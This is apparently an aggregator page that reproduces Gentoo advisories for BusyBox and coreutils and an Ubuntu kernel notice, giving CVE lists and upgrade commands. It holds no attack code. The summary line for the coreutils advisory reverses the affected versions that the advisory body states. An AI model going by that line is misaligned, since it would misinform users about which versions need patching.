Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
sys-apps/busybox  < 1.34.0      >= 1.34.0

Description  
===========

Multiple vulnerabilities have been discovered in BusyBox. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All BusyBox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-apps/busybox-1.34.0"

References  
==========

[ 1 ] CVE-2021-42373  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42373  
[ 2 ] CVE-2021-42374  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42374  
[ 3 ] CVE-2021-42375  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42375  
[ 4 ] CVE-2021-42376  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42376  
[ 5 ] CVE-2021-42377  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42377  
[ 6 ] CVE-2021-42378  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42378  
[ 7 ] CVE-2021-42379  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42379  
[ 8 ] CVE-2021-42380  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42380  
[ 9 ] CVE-2021-42381  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42381  
[ 10 ] CVE-2021-42382  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42382  
[ 11 ] CVE-2021-42383  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42383  
[ 12 ] CVE-2021-42384  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42384  
[ 13 ] CVE-2021-42385  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42385  
[ 14 ] CVE-2021-42386  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42386

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-17

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-17

Gentoo Linux Security Advisory 202407-16 - A vulnerability has been discovered in Coreutils, which can lead to a heap buffer overflow and possibly arbitrary code execution. Versions greater than or equal to 9.4-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-16  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: GNU Coreutils: Buffer Overflow Vulnerability  
     Date: July 05, 2024  
     Bugs: #922474  
       ID: 202407-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Coreutils, which can lead to a  
heap buffer overflow and possibly aribitrary code execution.

Background  
==========

The GNU Core Utilities are the basic file, shell and text manipulation  
utilities of the GNU operating system.

Affected packages  
=================

Package             Vulnerable    Unaffected  
------------------  ------------  ------------  
sys-apps/coreutils  < 9.4-r1      >= 9.4-r1

Description  
===========

A vulnerability has been discovered in the Coreutils "split" program  
that can lead to a heap buffer overflow and possibly arbitrary code  
execution.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Coreutils users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-apps/coreutils-9.4-r1"

References  
==========

[ 1 ] CVE-2024-0684  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0684

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-16

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-16

Ubuntu Security Notice 6873-2 - It was discovered that the Intel Data Streaming and Intel Analytics Accelerator drivers in the Linux kernel allowed direct access to the devices for unprivileged users and virtual machines. A local attacker could use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6873-2July 04, 2024linux-starfive-6.5 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-starfive-6.5: Linux kernel for StarFive processorsDetails:It was discovered that the Intel Data Streaming and Intel AnalyticsAccelerator drivers in the Linux kernel allowed direct access to thedevices for unprivileged users and virtual machines. A local attacker coulduse this to cause a denial of service. (CVE-2024-21823)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystem:   - Netfilter;(CVE-2024-26643, CVE-2024-26925, CVE-2024-26924, CVE-2024-26809)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS   linux-image-6.5.0-1016-starfive  6.5.0-1016.17~22.04.1   linux-image-starfive            6.5.0.1016.17~22.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6873-2   https://ubuntu.com/security/notices/USN-6873-1   CVE-2024-21823, CVE-2024-26643, CVE-2024-26809, CVE-2024-26924,   CVE-2024-26925Package Information: https://launchpad.net/ubuntu/+source/linux-starfive-6.5/6.5.0-1016.17~22.04.1

Tag

#mac